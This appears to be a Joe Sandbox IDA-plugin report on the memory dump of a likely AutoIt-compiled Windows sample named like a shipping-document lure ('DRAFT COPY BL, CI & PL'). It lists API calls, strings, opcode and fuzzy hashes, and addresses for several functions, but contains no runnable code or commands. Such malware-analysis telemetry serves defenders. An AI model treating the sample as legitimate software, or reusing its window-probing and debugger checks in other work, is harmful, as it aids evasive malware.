                                                                Similarity
                                                                • API ID: FullNamePath_memmove_wcscat
                                                                • String ID: `2
                                                                • API String ID: 257928180-1895914145
                                                                • Opcode ID: db8fb316ac94aa4e5a5f04573e7ef332567c75aa92555a33ff946c115f4dc580
                                                                • Instruction ID: a53e3ba47d36780994315ff9efbfb9cad20d51b70efe90182254793cdec04d9c
                                                                • Opcode Fuzzy Hash: db8fb316ac94aa4e5a5f04573e7ef332567c75aa92555a33ff946c115f4dc580
                                                                • Instruction Fuzzy Hash: C511A535A0930DABCB10FBA4CC16FDDB3FCAF88350F0144A5BB48D3281EAB096844B10
                                                                APIs
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                  • Part of subcall function 0098AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0098AABC
                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00988E73
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ClassMessageNameSend_memmove
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 372448540-1403004172
                                                                • Opcode ID: d61dfaf77276663dbcac174440a4827500271810458ca0cbc230922d17129fc1
                                                                • Instruction ID: 8d0324e0b536dd9742f12c680cafb7dd4c7a8d0c6a4de73c85fb552f2801cdab
                                                                • Opcode Fuzzy Hash: d61dfaf77276663dbcac174440a4827500271810458ca0cbc230922d17129fc1
                                                                • Instruction Fuzzy Hash: 0101F5B1601218ABDF15FBE0CC51AFEB369EF85320B440A19B831673D2DE315808C760
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: __fread_nolock_memmove
                                                                • String ID: EA06
                                                                • API String ID: 1988441806-3962188686
                                                                • Opcode ID: 3e516bafa41322cc960824b39e725e18a6d29b33b8f6ec85021e059368780a32
                                                                • Instruction ID: d4cafbb796781ae4f668f1151eb594ca65450bc99f8b9d800beeb7e75471472d
                                                                • Opcode Fuzzy Hash: 3e516bafa41322cc960824b39e725e18a6d29b33b8f6ec85021e059368780a32
                                                                • Instruction Fuzzy Hash: 8501F5728042587EDF28CAA9C816FEEBBFCDB11301F00459EF556D21C1E879E6088BA0
                                                                APIs
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                  • Part of subcall function 0098AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0098AABC
                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00988D6B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ClassMessageNameSend_memmove
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 372448540-1403004172
                                                                • Opcode ID: 256f95e7977c57c9ca77c40ceebecdcf59e5e318be8292dc3470e5f750fb895f
                                                                • Instruction ID: 2555bd73eecbd9a546d393319d3fe128155523c60bc618a5de8b5136d54e7710
                                                                • Opcode Fuzzy Hash: 256f95e7977c57c9ca77c40ceebecdcf59e5e318be8292dc3470e5f750fb895f
                                                                • Instruction Fuzzy Hash: 8101D4B1A41108ABDF25FBE1C952BFFB3A8DF55300F54041AB812632D1DE145E08D771
                                                                APIs
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                  • Part of subcall function 0098AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0098AABC
                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00988DEE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ClassMessageNameSend_memmove
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 372448540-1403004172
                                                                • Opcode ID: 9d8f8597e10682994d7f61d130f637ad2f0dc8b6ea84c84ac7d004e2a118c133
                                                                • Instruction ID: 507f2b35047eac45aa74f4326b6c73cd0d8427c1b3ca63a1aa8f6acd4bfef2fc
                                                                • Opcode Fuzzy Hash: 9d8f8597e10682994d7f61d130f637ad2f0dc8b6ea84c84ac7d004e2a118c133
                                                                • Instruction Fuzzy Hash: EC01DFB1A41108A7DB25FAE4C982BFFB3AC9B55300F540416B811632D2DA255E08D672
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ClassName_wcscmp
                                                                • String ID: #32770
                                                                • API String ID: 2292705959-463685578
                                                                • Opcode ID: feb5c57afdc51503febad4705e2651742d26466ca4c60e16d1592c00c2871334
                                                                • Instruction ID: 6ed6a286870644a96e98cee8734d8651765106d40e9d107918dddf41de5c8712
                                                                • Opcode Fuzzy Hash: feb5c57afdc51503febad4705e2651742d26466ca4c60e16d1592c00c2871334
                                                                • Instruction Fuzzy Hash: 50E092326043292AD7209A9AAC49FA7F7ACEB85B71F0001AAFD04D6051E9609A46C7E1
                                                                APIs
                                                                  • Part of subcall function 0096B314: _memset.LIBCMT ref: 0096B321
                                                                  • Part of subcall function 00950940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0096B2F0,?,?,?,0093100A), ref: 00950945
                                                                • IsDebuggerPresent.KERNEL32(?,?,?,0093100A), ref: 0096B2F4
                                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0093100A), ref: 0096B303
                                                                Strings
                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0096B2FE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                • API String ID: 3158253471-631824599
                                                                • Opcode ID: 23664fd3d23ee578cf5a513c996e882bb49d4b2a17e0219a47e63d0762847b32
                                                                • Instruction ID: 24db6233f769eb60d7cc6869074a4482358c45675c6e83e37985512ae49c8b27
                                                                • Opcode Fuzzy Hash: 23664fd3d23ee578cf5a513c996e882bb49d4b2a17e0219a47e63d0762847b32
                                                                • Instruction Fuzzy Hash: 54E065702147018BD720DF28EA14B467BE8AF80358F008A2DE896C7345EBB4E488CBA1
                                                                APIs
                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00987C82
                                                                  • Part of subcall function 00953358: _doexit.LIBCMT ref: 00953362
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Message_doexit
                                                                • String ID: AutoIt$Error allocating memory.
                                                                • API String ID: 1993061046-4017498283
                                                                • Opcode ID: 95444e1bd125de6065feba037d735e34009407a272c1f3c704967ef4832756dd
                                                                • Instruction ID: 5871d2f2b2ec3e7a1a1e82c65a350b103c77a9bb6f73e38feb80c9d9be9b6180
                                                                • Opcode Fuzzy Hash: 95444e1bd125de6065feba037d735e34009407a272c1f3c704967ef4832756dd
                                                                • Instruction Fuzzy Hash: 92D02B323C831832D20532E66C07FCAB7484F85B57F100015FF08595D349D2888043E9
                                                                APIs
                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009B59AE
                                                                • PostMessageW.USER32(00000000), ref: 009B59B5
                                                                  • Part of subcall function 00995244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009952BC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: FindMessagePostSleepWindow
                                                                • String ID: Shell_TrayWnd
                                                                • API String ID: 529655941-2988720461
                                                                • Opcode ID: f1f404a120d099311585647ba2737d5528b810252678c41dbfce32e979413308
                                                                • Instruction ID: ebc1fc86b7681bef0cc5f239009995de6dfcd76c8434ae54a5174a3ff8bf0ada
                                                                • Opcode Fuzzy Hash: f1f404a120d099311585647ba2737d5528b810252678c41dbfce32e979413308
                                                                • Instruction Fuzzy Hash: EED0A931384300BAE664AB749D0FFA72610AB48B20F000824B209AA0D0CCE0A800C664
                                                                APIs
                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009B596E
                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 009B5981
                                                                  • Part of subcall function 00995244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009952BC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: FindMessagePostSleepWindow
                                                                • String ID: Shell_TrayWnd
                                                                • API String ID: 529655941-2988720461
                                                                • Opcode ID: 178f0f2867f9d4ba03c4c49fd8870e353930ce5a78f560e883a2b165604c06c8
                                                                • Instruction ID: a252beedcb88ac7951d14d2ff309384d8b2ba99d42c9511814aed909f99fc44b
                                                                • Opcode Fuzzy Hash: 178f0f2867f9d4ba03c4c49fd8870e353930ce5a78f560e883a2b165604c06c8
                                                                • Instruction Fuzzy Hash: 5ED0C931798711B6E664AB749D1FFA76A14AB44B60F010925B659AA1D0CDE09800D664